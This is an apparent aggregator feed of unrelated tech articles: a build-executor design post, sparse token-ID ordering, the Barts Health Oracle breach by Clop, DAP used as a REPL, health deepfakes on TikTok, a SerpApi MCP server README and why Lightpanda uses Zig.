    -Wno-free-nonheap-object \
    -fno-omit-frame-pointer \
    '-std=c++17' \
    -MD \
    -MF \
    bazel-out/k8-fastbuild/bin/_objs/hello_world/hello_world.pic.d \
    '-frandom-seed=bazel-out/k8-fastbuild/bin/_objs/hello_world/hello_world.pic.o' \
    -fPIC \
    -iquote \
    . \
    -iquote \
    bazel-out/k8-fastbuild/bin \
    -iquote \
    external/rules_cc+ \
    -iquote \
    bazel-out/k8-fastbuild/bin/external/rules_cc+ \
    -iquote \
    external/bazel_tools \
    -iquote \
    bazel-out/k8-fastbuild/bin/external/bazel_tools \
    -c \
    hello_world.cpp \
    -o \
    bazel-out/k8-fastbuild/bin/_objs/hello_world/hello_world.pic.o \
    -fno-canonical-system-headers \
    -Wno-builtin-macro-redefined \
    '-D__DATE__="redacted"' \
    '-D__TIMESTAMP__="redacted"' \
    '-D__TIME__="redacted"')

Bazel’s language has graph operators, such as union, intersection, and filtering, that let you build up quite complex predicates. Ninja can only express one predicate at a time, with much more limited filtering—but unlike Bazel, allows you to filter to individual parts of the action, like the command line invocation, without needing a full protobuf parser or trying to do text post-processing.

I would like to see a query language that combines both these strengths: the same nested predicate structure of Bazel queries, but add a new emit() predicate that takes another predicate as an argument for complex output filtering:

emit(commands, inputs(".*cpp", deps(./src/hello_world)))

We could even go so far as to give this a jq-like syntax:

./src/hello_world | deps | inputs "*.c++" | emit commands

For more complex predicates that have multiple sets as inputs, such as set union and intersection, we could introduce a subquery operator:

glob "src/**" | except subquery(glob("src/package/**") | executable)

tracing

In my previous post , I talked about two main uses for a tracing build system: first, to automatically add dependency edges for you; and second, to verify at runtime that no dependency edges are missing. This especially shines when the action graph has a way to express negative dependencies, because the tracing system sees every attempted file access and can add them to the graph automatically.

For prior art, see the Shake build system . Shake is higher-level than an executor and doesn't work on an action graph, but it has built-in support for file tracing in all three of these modes: warning about incorrect edges; adding new edges to the graph when they're detected at runtime; and finally, fully inferring all edges from the nodes alone .

I would want my executor to only support linting and hard errors for missing edges. Inferring a full action graph is scary and IMO belongs in a higher-level tool, and adding dependency edges automatically can be done by a tool that wraps the executor and parses the lints.

What's really cool about this linting system is that it allows you to gradually transition to a hermetic build over time, without frontloading all the work to when you switch to the tool.

environment variables

Tracing environment variable access is … hard. Traditionally access goes through the libc getenv function, but it’s also possible to take an envp in a main function, in which case accesses are just memory reads. That means we need to trace memory reads somehow.

On x86 machines, there’s something called PIN that can do this directly in the CPU without needing compile time instrumentation. On ARM there’s SPE , which is how perf mem works, but I’m not sure whether it can be configured to track 100% of memory accesses. I need to do more research here.

On Linux, this is all abstracted by perf_event_open . I’m not sure if there’s equivalent wrappers on Windows and macOS.

One last way to do this is with a SIGSEGV signal handler , but that requires that environment variables are in their own page of memory and therefore a linker script. This doesn’t work for environment variables specifically, because they aren’t linker symbols in the normal sense, they get injected by the C runtime . In general, injecting linker scripts means we’re modifying the binaries being run and might cause unexpected build or runtime failures.

ronin : a ninja successor

Here I describe more concretely the tool I want to build, which I’ve named ronin . It would read the constrained clojure action graph serialization format (Magma) that I describe in the previous post; perhaps with a way to automatically convert Ninja files to Magma.

interface

Like Ekam , Ronin would have a --watch continuous rebuild mode (but unlike Bazel and Buck2, no background server). Like Shake, It would have runtime tracing, with all of --tracing=never|warn|error options, to allow gradually transitioning to a hermetic build. And it would have bazel-like querying for the action graph, both through CLI arguments with an jq syntax and through a programmatic API.

Finally, it would have pluggable backends for file watching, tracing, stat-ing, progress reporting, and checksums, so that it can take advantage of systems that have more features while still being reasonably fast on systems that don’t. For example, on Windows stats are slow, so it would cache stat info; but on Linux stats are fast so it would just directly make a syscall.

architecture

Like Ninja, Ronin would keep a command log with a history of past versions of the action graph. It would reuse the bipartite graph structure , with one half being files and the other being commands. It would parse depfiles and dyndeps files just after they’re built, while the cache is still hot.

Like n2 , ronin would use a single-pass approach to support early cutoff. It would hash an "input manifest" to decide whether to rebuild. Unlike n2 , it would store a mapping from that hash back to the original manifest so you can query why a rebuild happened.

Tracing would be built on top of a FUSE file system that tracked file access. 3

Unlike other build systems I know, state (such as manifest hashes, content hashes, and removed outputs) would be stored in an SQLite database, not in flat files.

did you just reinvent buck2?

Kinda. Ronin takes a lot of ideas from buck2. It differs in two major ways:

  • It does not expect to be a top-level build system. It is perfectly happy to read (and encourages) generated files from a higher level configure tool. This allows systems like CMake and Meson to mechanically translate Ninja files into this new format, so builds for existing projects can get nice things.
  • It allows you to gradually transition from non-hermetic to hermetic builds, without forcing you to fix all your rules at once, and with tracing to help you find where you need to make your fixes. Buck2 doesn’t support tracing at all. It technically supports non-hermetic builds, but you don't get many benefits compared to using a different build system, and it's still high cost to switch build systems 4 .

The main advantage of Ronin is that it can slot in underneath existing build systems people are already using—CMake and Meson—without needing changes to your build files at all.

summary

In this post I describe what a build executor does, some features I would like to see from an executor (with a special focus on tracing), and a design for a new executor called ronin that allows existing projects generating ninja files to gradually transition to hermetic builds over time, without a “flag day” that requires rewriting the whole build system.

I don’t know yet if I will actually build this tool, that seems like a lot of work 5 😄 but it’s something I would like to exist in the world.

  1. In many ways Conan profiles are analogous to ninja files: profiles are the interface between Conan and CMake in the same way that ninja files are the interface between CMake and Ninja. Conan is the only tool I'm aware of where the split between the package manager and the configure step is explicit.

  2. This is not an apple to apples comparison; ideally we would name the target by the output file, not by its alias. Unfortunately output names are unpredictable and quite long in Bazel.

  3. macOS does not have native support for FUSE. MacFuse exists but does not support getting the PID of the calling process. A possible workaround would be to start a new FUSE server for each spawned process group. FUSE on Windows is possible through winfsp .

  4. An earlier version of this post read "Buck2 only supports non-hermetic builds for system toolchains , not anything else", which is not correct.

  5. what if i simply took buck2 and hacked it to bits,,,

Picking Optimal Token IDs

Lobsters
notes.hella.cheap
2025-12-05 19:41:33
Comments...
Original Article

I have a search index that stores, for each of a bunch of documents, the set of tokens that occur in that document. I encode that as a sparse bit vector, where each token has an ID and the bit at that index in the bit vector indicates whether that token is present in the document. Since most tokens do not occur in most documents, these vectors are sparse (most of the bits are zeros).

Since the vectors are sparse I can save a lot of space by not storing all the zero bits. The simplest way to do this is with different flavors of run-length encoding, but in order to make intersection and subset tests fast I actually use a representation that's more like the nodes in an array-mapped tree ; there's a bitmask with one bit per 64-bit word of the bit vector indicating whether that word contains any nonzero bits, and we only store the 64-bit words that aren't zero.

Either way, whether we're using RLE or our mask encoding, the longer our contiguous runs of zeros are, the less data we have to store. While we don't get to pick what tokens occur in which documents, we do get to pick which tokens are next to each other in the vector; ie we're free to choose whatever token IDs we want. We want to choose token ids such that the one bits are all clumped together.

Another way to say we want one bits clumped together is to say we want to maximize the probability that a particular bit is a one given that its neighbors are ones, and maximize the propbability that a bit is a zero if its neighbors are zeros.

We can calculate those probabilities by generating a co-occurrence matrix. That's a symmetric matrix whose rows and columns are tokens, and where the value at a,b is the number of times a and b occur in the same document.

Now we want to choose an ordering of the rows where closer rows are closer together. We do that by finding the eigenvector of the matrix with the largest eigenvalue, multiplying by that vector (which gives us a single column vector), and then sorting by the values of that column vector. This is basically doing PCA down to 1D .

This works in practice, and gives me an overall 12% improvement in index size over choosing token ids at random.

Barts Health NHS discloses data breach after Oracle zero-day hack

Bleeping Computer
www.bleepingcomputer.com
2025-12-05 18:55:26
Barts Health NHS Trust has announced that Clop ransomware actors have stolen files from a database by exploiting a vulnerability in its Oracle E-business Suite software. [...]...
Original Article

Barts Health NHS discloses data breach after Oracle zero-day hack

Barts Health NHS Trust, a major healthcare provider in England, announced that Clop ransomware actors have stolen files from one of its databases after exploiting a vulnerability in its Oracle E-business Suite software.

The stolen data are invoices spanning several years that expose the full names and addresses of individuals who paid for treatment or other services at Barts Health hospital.

Information of former employees who owed money to the trust, and suppliers whose data is already public, has also been exposed, the organization says.

In addition to Barts' files, the compromised database include files concerning accounting services the trust provided since April 2024 to Barking, Havering, and Redbridge University Hospitals NHS Trust.

Cl0p ransomware has leaked the stolen information on their leak portal on the dark web.

"The theft occurred in August, but there was no indication that trust data was at risk until November when the files were posted on the dark web," explained Barts .

"To date no information has been published on the general internet, and the risk is limited to those able to access compressed files on the encrypted dark web."

The hospitals operator stated that it is in the process of getting a High Court order to ban the publication, use, or sharing of the exposed data by anyone, though such orders have limited effect in practice.

Barts Health NHS Trust runs five hospitals throughout the city of London, namely Mile End Hospital, Newham University Hospital, Royal London Hospital, St Bartholomew's Hospital, and Whipps Cross University Hospital.

The Clop ransomware gang has been exploiting a critical Oracle EBS flaw tracked as CVE-2025-61882 as a zero-day in data theft attacks since early August , stealing private information from a large number of organizations worldwide.

Victims that have confirmed impact from Cl0p ransomware's campaign include Envoy Air , Harvard University , GlobalLogic , Washington Post , Logitech , Dartmouth College , the University of Pennsylvania , and the University of Phoenix .

Barts has already informed the National Cyber Security Centre, the Metropolitan Police, and the Information Commissioner's Office (ICO) about the data theft incident.

The healthcare organization assured that Clop's attack did not impact its electronic patient record and clinical systems, and it is confident that its core IT infrastructure remains secure.

Patients who have paid Barts are recommended to check their invoices to determine what data was exposed and to stay vigilant for unsolicited communications, especially messages that request payment or the sharing of sensitive information.

tines

Break down IAM silos like Bitpanda, KnowBe4, and PathAI

Broken IAM isn't just an IT problem - the impact ripples across your whole business.

This practical guide covers why traditional IAM practices fail to keep up with modern demands, examples of what "good" IAM looks like, and a simple checklist for building a scalable strategy.

The Debug Adapter Protocol is a REPL protocol in disguise

Hacker News
zignar.net
2025-12-05 18:51:38
Comments...
Original Article

Table of content


A couple months back I created nluarepl . It’s a REPL for the Neovim Lua interpreter with a little twist: It’s using the Debug Adapter Protocol. And before that, I worked on hprofdap . Also a kind of a REPL using DAP that lets you inspect Java heap dumps ( .hprof files) using OQL.

As the name might imply, a REPL isn’t the main use case for the Debug Adapter Protocol (DAP). From the DAP page :

The idea behind the Debug Adapter Protocol (DAP) is to abstract the way how the debugging support of development tools communicates with debuggers or runtimes into a protocol.

But it works surprisingly well for a REPL interface to a language interpreter too.

Essentials

The typical REPL shows you a prompt after which you can enter an expression. You then hit Enter to submit the expression, it gets evaluated and you’re presented with the result or an error.

The Debug Adapter protocol defines a evaluate command which - as the name implies - evaluates expressions.

The definition for the payload the client needs to send looks like this:

interface EvaluateArguments {
  /**
   * The expression to evaluate.
   */
  expression: string;

  // [...]
}

With a few more optional properties.

The (important bit) of the response format definition looks like this:

interface EvaluateResponse extends Response {
  body: {
    /**
     * The result of the evaluate request.
     */
    result: string;

    /**
     * The type of the evaluate result.
     * This attribute should only be returned by a debug adapter if the
     * corresponding capability `supportsVariableType` is true.
     */
    type?: string;

    /**
     * If `variablesReference` is > 0, the evaluate result is structured and its
     * children can be retrieved by passing `variablesReference` to the
     * `variables` request as long as execution remains suspended. See 'Lifetime
     * of Object References' in the Overview section for details.
     */
    variablesReference: number;

    // [...]
}

result is a string and there is optionally a type. The neat bit is the variablesReference . It’s used to model structured data - allowing to build a tree-like UI to drill down into the details of a data structure.

Here is a demo to see it in action:

To get the data - or expand an option as shown in the demo above, the client must call the variables command with the variablesReference as payload. The response has an array of variables, where a variable looks like this:

interface Variable {
  /**
   * The variable's name.
   */
  name: string;

  /**
   * The variable's value.
   * This can be a multi-line text, e.g. for a function the body of a function.
   * For structured variables (which do not have a simple value), it is
   * recommended to provide a one-line representation of the structured object.
   * This helps to identify the structured object in the collapsed state when
   * its children are not yet visible.
   * An empty string can be used if no value should be shown in the UI.
   */
  value: string;

  /**
   * The type of the variable's value. Typically shown in the UI when hovering
   * over the value.
   * This attribute should only be returned by a debug adapter if the
   * corresponding capability `supportsVariableType` is true.
   */
  type?: string;


  /**
   * If `variablesReference` is > 0, the variable is structured and its children
   * can be retrieved by passing `variablesReference` to the `variables` request
   * as long as execution remains suspended. See 'Lifetime of Object References'
   * in the Overview section for details.
   */
  variablesReference: number;

  // [...]
}

A Variable is pretty similar to the initial evaluate result, except that it has both name and value. It also again has a variablesReference property, which means that they can be arbitrarily deeply nested (and you can have cyclic references).

This already covers most of the functionality of a typical REPL backend. One more feature that’s nice to have is completion, and the Debug Adapter Protocol also has a completions command for that. Click on the link if you’re interested - I won’t go into detail about that here.

Another untypical feature for a REPL that the Debug Adapter Protocol provides is finding the locations of a variable definition. That’s also implemented in nluarepl , although it only works for functions.

The Boilerplate

You might be wondering if there is anything in the Debug Adapter Protocol one must implement that’s useless baggage if all you want is a REPL frontend or backend.

Yes, there are are a few things:

  • There’s the RPC mechanism, which is close to JSON-RPC, but not quite.
  • Breakpoint handling. You can send back a response that rejects all. ( nluarepl implements log points - which is basically dynamic log statements you can create at runtime)
  • Session initialization. Here you can send back the capabilities.
  • launch / attach pseudo handling.
  • Disconnect/terminate handling. Not much needed here - you can use these to clean up any state.

The typical flow is that a client starts a debug session with a initialize command. Then the debug adapter replies with its capabilities and a normal client follows up sending breakpoints. After that it typically follows up with a launch command, which in a normal scenario would launch the application you want to debug.

To give you an impression of what this entails, here’s a snippet of the nluarepl code to implement the “dummy” actions:

function Client:initialize(request)
  ---@type dap.Capabilities
  local capabilities = {
    supportsLogPoints = true,
    supportsConditionalBreakpoints = true,
    supportsCompletionsRequest = true,
    completionTriggerCharacters = {"."},
  }
  self:send_response(request, capabilities)
  self:send_event("initialized", {})
end


function Client:disconnect(request)
  debug.sethook()
  self:send_event("terminated", {})
  self:send_response(request, {})
end


function Client:terminate(request)
  debug.sethook()
  self:send_event("terminated", {})
  self:send_response(request, {})
end

function Client:launch(request)
  self:send_response(request, {})
end

Motivation

Final question: Why would you do that?

Partly because of lazyness. From a development perspective I didn’t want to have to implement another REPL UI. Going the DAP route let me focus on the evaluation parts. And from a user perspective - I also wanted to re-use UI elements from nvim-dap . I’m used to that interface and have keymaps setup. I didn’t want to have another slightly different interface with different keymaps or behavior.

SpaceX in Talks for Share Sale That Would Boost Valuation to $800B

Hacker News
www.wsj.com
2025-12-05 18:49:07
Comments...
Original Article

Please enable JS and disable any ad blocker

AI deepfakes of real doctors spreading health misinformation on social media

Guardian
www.theguardian.com
2025-12-05 18:45:58
Hundreds of videos on TikTok and elsewhere impersonate experts to sell supplements with unproven effects TikTok and other social media platforms are hosting AI-generated deepfake videos of doctors whose words have been manipulated to help sell supplements and spread health misinformation. The factc...
Original Article

TikTok and other social media platforms are hosting AI-generated deepfake videos of doctors whose words have been manipulated to help sell supplements and spread health misinformation.

The factchecking organisation Full Fact has uncovered hundreds of such videos featuring impersonated versions of doctors and influencers directing viewers to Wellness Nest, a US-based supplements firm.

All the deepfakes involve real footage of a health expert taken from the internet. However, the pictures and audio have been reworked so that the speakers are encouraging women going through menopause to buy products such as probiotics and Himalayan shilajit from the company’s website.

The revelations have prompted calls for social media giants to be much more careful about hosting AI-generated content and quicker to remove content that distorts prominent people’s views.

“This is certainly a sinister and worrying new tactic,” said Leo Benedictus, the factchecker who undertook the investigation, which Full Fact published on Friday.

He added that the creators of deepfake health videos deploy AI so that “someone well-respected or with a big audience appears to be endorsing these supplements to treat a range of ailments”.

Prof David Taylor-Robinson, an expert in health inequalities at Liverpool University, is among those whose image has been manipulated. In August, he was shocked to find that TikTok was hosting 14 doctored videos purporting to show him recommending products with unproven benefits.

Though Taylor-Robinson is a specialist in children’s health, in one video the cloned version of him was talking about an alleged menopause side-effect called “thermometer leg”.

The fake Taylor-Robinson recommended that women in menopause should visit a website called Wellness Nest and buy what it called a natural probiotic featuring “10 science-backed plant extracts, including turmeric, black cohosh, Dim [diindolylmethane] and moringa, specifically chosen to tackle menopausal symptoms”.

Female colleagues “often report deeper sleep, fewer hot flushes and brighter mornings within weeks”, the deepfake doctor added.

The real Taylor-Robinson discovered that his likeness was being used only when a colleague alerted him. “It was really confusing to begin with – all quite surreal,” he said. “My kids thought it was hilarious.

A small pile of oral capsules
Black cohosh supplement pills. Photograph: Julie Woodhouse/Alamy

“I didn’t feel desperately violated, but I did become more and more irritated at the idea of people selling products off the back of my work and the health misinformation involved.”

The footage of Taylor-Robinson used to make the deepfake videos came from a talk on vaccination he gave at a Public Health England (PHE) conference in 2017 and a parliamentary hearing on child poverty at which he gave evidence in May this year.

In one misleading video, he was depicted swearing and making misogynistic comments while discussing menopause.

TikTok took down the videos six weeks after Taylor-Robinson complained. “Initially, they said some of the videos violated their guidelines but some were fine. That was absurd – and weird – because I was in all of them and they were all deepfakes. It was a faff to get them taken down,” he said.

Full Fact found that TikTok was also carrying eight deepfakes featuring doctored statements by Duncan Selbie, the former chief executive of PHE. Like Taylor-Robinson, he was falsely shown talking about menopause, using video taken from the same 2017 event where Taylor-Robinson spoke.

One video, also about “thermometer leg”, was “an amazing imitation”, Selbie said. “It’s a complete fake from beginning to end. It wasn’t funny in the sense that people pay attention to these things.”

skip past newsletter promotion

Full Fact also found similar deepfakes on X, Facebook and YouTube, all linked to Wellness Nest or a linked British outlet called Wellness Nest UK. It has posted apparent deepfakes of high-profile doctors such as Prof Tim Spector and another diet expert, the late Dr Michael Mosley.

Michael Mosley
Michael Mosley. Photograph: TT News Agency/Alamy

Wellness Nest told Full Fact that deepfake videos encouraging people to visit the firm’s website were “100% unaffiliated” with its business. It said it had “never used AI-generated content”, but “cannot control or monitor affiliates around the world”.

Helen Morgan, the Liberal Democrat health spokesperson, said: “From fake doctors to bots that encourage suicide, AI is being used to prey on innocent people and exploit the widening cracks in our health system.

“Liberal Democrats are calling for AI deepfakes posing as medical professionals to be stamped out, with clinically approved tools strongly promoted so we can fill the vacuum.

“If these were individuals fraudulently pretending to be doctors they would face criminal prosecution. Why is the digital equivalent being tolerated?

“Where someone seeks health advice from an AI bot they should be automatically referred to NHS support so they can get the diagnosis and treatment they actually need, with criminal liability for those profiting from medical disinformation.”

A TikTok spokesperson said: We have removed this content [relating to Taylor-Robinson and Selbie] for breaking our rules against harmful misinformation and behaviours that seek to mislead our community, such as impersonation.

“Harmfully misleading AI-generated content is an industry-wide challenge, and we continue to invest in new ways to detect and remove content that violates our community guidelines.”

The Department of Health and Social Care was approached for comment.

Quick Guide

Contact us about this story

Show

The best public interest journalism relies on first-hand accounts from people in the know.

If you have something to share on this subject, you can contact us confidentially using the following methods.

Secure Messaging in the Guardian app

The Guardian app has a tool to send tips about stories. Messages are end to end encrypted and concealed within the routine activity that every Guardian mobile app performs. This prevents an observer from knowing that you are communicating with us at all, let alone what is being said.

If you don't already have the Guardian app, download it ( iOS / Android ) and go to the menu. Select ‘Secure Messaging’.

SecureDrop, instant messengers, email, telephone and post

If you can safely use the Tor network without being observed or monitored, you can send messages and documents to the Guardian via our SecureDrop platform .

Finally, our guide at theguardian.com/tips lists several ways to contact us securely, and discusses the pros and cons of each.

Illustration: Guardian Design / Rich Cousins

Show HN: SerpApi MCP Server

Hacker News
github.com
2025-12-05 18:30:06
Comments...
Original Article

SerpApi MCP Server

A Model Context Protocol (MCP) server implementation that integrates with SerpApi for comprehensive search engine results and data extraction.

Python 3.13+ MIT License

Features

  • Multi-Engine Search : Google, Bing, Yahoo, DuckDuckGo, YouTube, eBay, and more
  • Real-time Weather Data : Location-based weather with forecasts via search queries
  • Stock Market Data : Company financials and market data through search integration
  • Dynamic Result Processing : Automatically detects and formats different result types
  • Flexible Response Modes : Complete or compact JSON responses
  • JSON Responses : Structured JSON output with complete or compact modes

Quick Start

SerpApi MCP Server is available as a hosted service at mcp.serpapi.com . In order to connect to it, you need to provide an API key. You can find your API key on your SerpApi dashboard .

You can configure Claude Desktop to use the hosted server:

{
  "mcpServers": {
    "serpapi": {
      "url": "https://mcp.serpapi.com/YOUR_SERPAPI_API_KEY/mcp"
    }
  }
}

Self-Hosting

git clone https://github.com/serpapi/serpapi-mcp.git
cd serpapi-mcp
uv sync && uv run src/server.py

Configure Claude Desktop:

{
  "mcpServers": {
    "serpapi": {
      "url": "http://localhost:8000/YOUR_SERPAPI_API_KEY/mcp"
    }
  }
}

Get your API key: serpapi.com/manage-api-key

Authentication

Two methods are supported:

  • Path-based : /YOUR_API_KEY/mcp (recommended)
  • Header-based : Authorization: Bearer YOUR_API_KEY

Examples:

# Path-based
curl "https://mcp.serpapi.com/your_key/mcp" -d '...'

# Header-based  
curl "https://mcp.serpapi.com/mcp" -H "Authorization: Bearer your_key" -d '...'

Search Tool

The MCP server has one main Search Tool that supports all SerpApi engines and result types. You can find all available parameters on the SerpApi API reference .

The parameters you can provide are specific for each API engine. Some sample parameters are provided below:

  • params.q (required): Search query
  • params.engine : Search engine (default: "google_light")
  • params.location : Geographic filter
  • mode : Response mode - "complete" (default) or "compact"
  • ...see other parameters on the SerpApi API reference

Examples:

{"name": "search", "arguments": {"params": {"q": "coffee shops", "location": "Austin, TX"}}}
{"name": "search", "arguments": {"params": {"q": "weather in London"}}}
{"name": "search", "arguments": {"params": {"q": "AAPL stock"}}}
{"name": "search", "arguments": {"params": {"q": "news"}, "mode": "compact"}}
{"name": "search", "arguments": {"params": {"q": "detailed search"}, "mode": "complete"}}

Supported Engines: Google, Bing, Yahoo, DuckDuckGo, YouTube, eBay, and more.

Result Types: Answer boxes, organic results, news, images, shopping - automatically detected and formatted.

Development

# Local development
uv sync && uv run src/server.py

# Docker
docker build -t serpapi-mcp . && docker run -p 8000:8000 serpapi-mcp

# Testing with MCP Inspector
npx @modelcontextprotocol/inspector
# Configure: URL mcp.serpapi.com/YOUR_KEY/mcp, Transport "Streamable HTTP transport"

Troubleshooting

  • "Missing API key" : Include key in URL path /{YOUR_KEY}/mcp or header Bearer YOUR_KEY
  • "Invalid key" : Verify at serpapi.com/dashboard
  • "Rate limit exceeded" : Wait or upgrade your SerpApi plan
  • "No results" : Try different query or engine

Contributing

  1. Fork the repository
  2. Create your feature branch: git checkout -b feature/amazing-feature
  3. Install dependencies: uv install
  4. Make your changes
  5. Commit changes: git commit -m 'Add amazing feature'
  6. Push to branch: git push origin feature/amazing-feature
  7. Open a Pull Request

License

MIT License - see LICENSE file for details.

Why we built Lightpanda in Zig

Hacker News
lightpanda.io
2025-12-05 18:29:50
Comments...
Original Article

Because We're Not Smart Enough for C++ or Rust

Francis Bouvier

Francis Bouvier

Cofounder & CEO

Why We Built Lightpanda in Zig

TL;DR

To be honest, when I began working on Lightpanda, I chose Zig because I’m not smart enough to build a big project in C++ or Rust.

I like simple languages. I like Zig for the same reasons I like Go, C, and the KISS principle. Not just because I believe in this philosophy, but because I’m not capable of handling complicated abstractions at scale.

Before Lightpanda, I was doing a lot of Go. But building a web browser from scratch requires a low-level systems programming language to ensure great performance, so Go wasn’t an option. And for a project like this, I wanted more safety and modern tooling than C.

Why We Built Lightpanda in Zig

Our requirements were performance, simplicity, and modern tooling. Zig seemed like the perfect balance: simpler than C++ and Rust, top-tier performance, and better tooling and safety than C.

As we built the first iterations of the browser and dug deeper into the language, we came to appreciate features where Zig particularly shines: comptime metaprogramming, explicit memory allocators, and best-in-class C interoperability. Not to mention the ongoing work on compilation times.

Of course it’s a big bet. Zig is a relatively new language with a small ecosystem. It’s pre-1.0 with regular breaking changes. But we’re very bullish on this language, and we’re not the only ones: Ghostty , Bun , TigerBeetle , and ZML are all building with Zig. And with Anthropic’s recent acquisition of Bun , big tech is taking notice.

Here’s what we’ve learned.

What Lightpanda Needs from a Language

Before diving into specifics, let’s talk about what building a browser for web automation requires.

First, we needed a JavaScript engine. Without one, a browser only sees static HTML: no client-side rendering and no dynamic content. We chose V8, Chrome’s JavaScript engine, because it’s state of the art, widely used ( Node.js , Deno ), and relatively easy to embed.

V8 is written in C++, and doesn’t have a C API, which means any language integrating with it must handle C++ boundaries. Zig doesn’t interoperate directly with C++, but it has first-class C interop, and C remains the lingua franca of systems programming. We use C headers generated primarily from rusty_v8 , part of the Deno project , to bridge between V8’s C++ API and our Zig code.

Beyond integration, performance and memory control were essential. When you’re crawling thousands of pages or running automation at scale, every millisecond counts. We also needed precise control over short-lived allocations like DOM trees, JavaScript objects, and parsing buffers. Zig’s explicit allocator model fits that need perfectly.

Why Not C++?

C++ was the obvious option: it powers virtually every major browser engine. But here’s what gave us pause.

  • Four decades of features : C++ has accumulated enormous complexity over the years. There are multiple ways to do almost everything: template metaprogramming, multiple inheritance patterns, various initialization syntaxes. We wanted a language with one clear way to do things.
  • Memory management : Control comes with constant vigilance. Use-after-free bugs, memory leaks, and dangling pointers are real risks. Smart pointers help, but they add complexity and runtime overhead. Zig’s approach of passing allocators explicitly makes memory management clearer and enables patterns like arenas more naturally.
  • Build systems : Anyone who’s fought with CMake or dealt with header file dependencies knows this pain. For a small team trying to move quickly, we didn’t want to waste time debugging build configuration issues.

We’re not saying C++ is bad. It powers incredible software. But for a small team starting from scratch, we wanted something simpler.

Why not Rust?

Many people ask this next. It’s a fair challenge. Rust is a more mature language than Zig, offers memory safety guarantees, has excellent tooling, and a growing ecosystem.

Rust would have been a viable choice. But for Lightpanda’s specific needs (and honestly, for our team’s experience level) it introduced friction we didn’t want.

The Unsafe Rust Problem

When you need to do things the borrow checker doesn’t like, you end up writing unsafe Rust, which is surprisingly hard. Zack from Bun explores this in depth in his article When Zig is safer and faster than Rust .

Browser engines and garbage-collected runtimes are classic examples of code that fights the borrow checker. You’re constantly juggling different memory regions: per-page arenas, shared caches, temporary buffers, objects with complex interdependencies. These patterns don’t map cleanly to Rust’s ownership model. You end up either paying performance costs (using indices instead of pointers, unnecessary clones) or diving into unsafe code where raw pointer ergonomics are poor and Miri becomes your constant companion.

Zig takes a different approach. Rather than trying to enforce safety through the type system and then providing an escape hatch, Zig is designed for scenarios where you’re doing memory-unsafe things. It gives you tools to make that experience better: non-null pointers by default, the GeneralPurposeAllocator that catches use-after-free bugs in debug mode, and pointer types with good ergonomics.

Why Zig Works for Lightpanda

Zig sits in an interesting space. It’s a simple language that’s easy to learn, where everything is explicit: no hidden control flow, no hidden allocations.

Explicit Memory Management with Allocators

Zig makes you choose how memory is managed through allocators. Every allocation requires you to specify which allocator to use. This might sound tedious at first, but it gives you precise control.

Here’s what this looks like in practice, using an arena allocator:

This pattern matches browser workloads perfectly. Each page load gets its own arena. When the page is done, we throw away the entire memory chunk. No tracking individual allocations, no reference counting overhead, no garbage collection pauses. (Though we’re learning that single pages can grow large in memory, so we’re also exploring mid-lifecycle cleanup strategies). And you can chain arenas, to create short-lived objects inside a page lifecycle.

Compile-Time Metaprogramming

Zig’s comptime feature lets you write code that runs during compilation. We use this extensively to reduce boilerplate when bridging Zig and JavaScript.

When integrating V8, you need to expose native types to JavaScript. In most languages, this requires glue code for each type. To generate this glue you need some code generation, usually through Macros (Rust, C, C++). Macros are a completely different language, which has a lot of downsides. Zig’s comptime lets us automate this:

The registerType function uses comptime reflection to:

  • Find all public methods on Point
  • Generate JavaScript wrapper functions
  • Create property getters/setters for x and y
  • Handle type conversions automatically

This eliminates manual binding code and makes adding new types simple by using the same language at compile time and runtime.

C Interop That Just Works

Zig’s C interop is a first-class feature: you can directly import C header files and call C functions without wrapper libraries.

For example, we use cURL as our HTTP library. We can just import libcurl C headers in Zig and use the C functions directly:

It feels as simple as using C, except you are programming in Zig.

And with the build system it’s also very simple to add the C sources to build everything together (your zig code and the C libraries):

This simplicity of importing C mitigates the fact that the Zig ecosystem is still small, as you can use all the existing C libraries.

The Build System Advantage

Zig includes its own build system written in Zig itself. This might sound unremarkable, but compared to CMake, it’s refreshingly straightforward. Adding dependencies, configuring compilation flags, and managing cross-compilation all happen in one place with clear semantics. Runtime, comptime, build system: everything is in Zig, which makes things easier.

Cross-compilation in particular is usually a difficult topic, but it’s very easy with Zig. Some projects like Uber use Zig mainly as a build system and toolchain.

Compile times matter

Zig compiles fast. Our full rebuild takes under a minute. Not as fast as Go or an interpreted language, but enough to have a feedback loop that makes development feel responsive. In that regard, Zig is considerably faster than Rust or C++.

This is a strong focus of the Zig team. They are also a small team and they need fast compilation for the development of the language, as Zig is written in Zig (self-hosted). For that purpose, they are developing native compiler backends (i.e. not using LLVM), which is very ambitious and yet successful: it’s already the default backend for x86 in debug mode, with a significant improvement in build times ( 3.5x faster for the Zig project itself ). And incremental compilation is on its way.

What We’ve Learned

After months of building Lightpanda in Zig, here’s what stands out.

  • The learning curve is manageable. Zig’s simplicity means you can understand the entire language in a few weeks. Compared to Rust or C++, this makes a real difference.
  • The allocator model pays off. Being able to create arena allocators per page load, per request, or per task gives us fine-grained memory control without tracking individual allocations.
  • The community is small but helpful. Zig is still growing. The Discord community and ziggit.dev are active, and the language is simple enough that you can often figure things out by reading the standard library source.

Conclusion

Lightpanda wouldn’t exist without the work of the Zig Foundation and the community behind it. Zig has made it possible to build something as complex as a browser with a small team and a clear mental model, without sacrificing performance.

FAQ

Is Zig stable enough for production use?

Zig is still pre-1.0, which means breaking changes can happen between versions. That said, we’ve found it stable enough for our production use, especially since the ecosystem has largely standardized on tracking the latest tagged releases rather than main. The language itself is well-designed, and most changes between versions are improvements that are worth adapting to. Just be prepared to update code when upgrading Zig versions.

What’s the hardest part about learning Zig?

The allocator model takes adjustment if you’re coming from garbage-collected languages. You need to think about where memory comes from and when it gets freed. But compared to Rust’s borrow checker or C++‘s memory management, it’s relatively straightforward once you understand the patterns.

Can Zig really replace C++ for browser development?

For building a focused browser like Lightpanda, yes. For replacing Chromium or Firefox, that’s unlikely: those projects have millions of lines of C++ and decades of optimization. We’re more likely to see Rust complementing C++ in those projects over time, for example how Firefox is leveraging Servo . But for new projects where you control the codebase, Zig is absolutely viable.

Where can I learn more about Zig?

Start with the official Zig documentation . The Zig Learn site provides practical tutorials. And join the community on Discord or ziggit.dev where developers actively help newcomers. The language is simple enough that reading standard library source code is also a viable learning approach.


Francis Bouvier

Francis Bouvier

Cofounder & CEO

Francis previously cofounded BlueBoard, an ecommerce analytics platform acquired by ChannelAdvisor in 2020. While running large automation systems he saw how limited existing browsers were for this kind of work. Lightpanda grew from his wish to give developers a faster and more reliable way to automate the web.

‘Urgent clarity’ sought over racial bias in UK police facial recognition technology

Guardian
www.theguardian.com
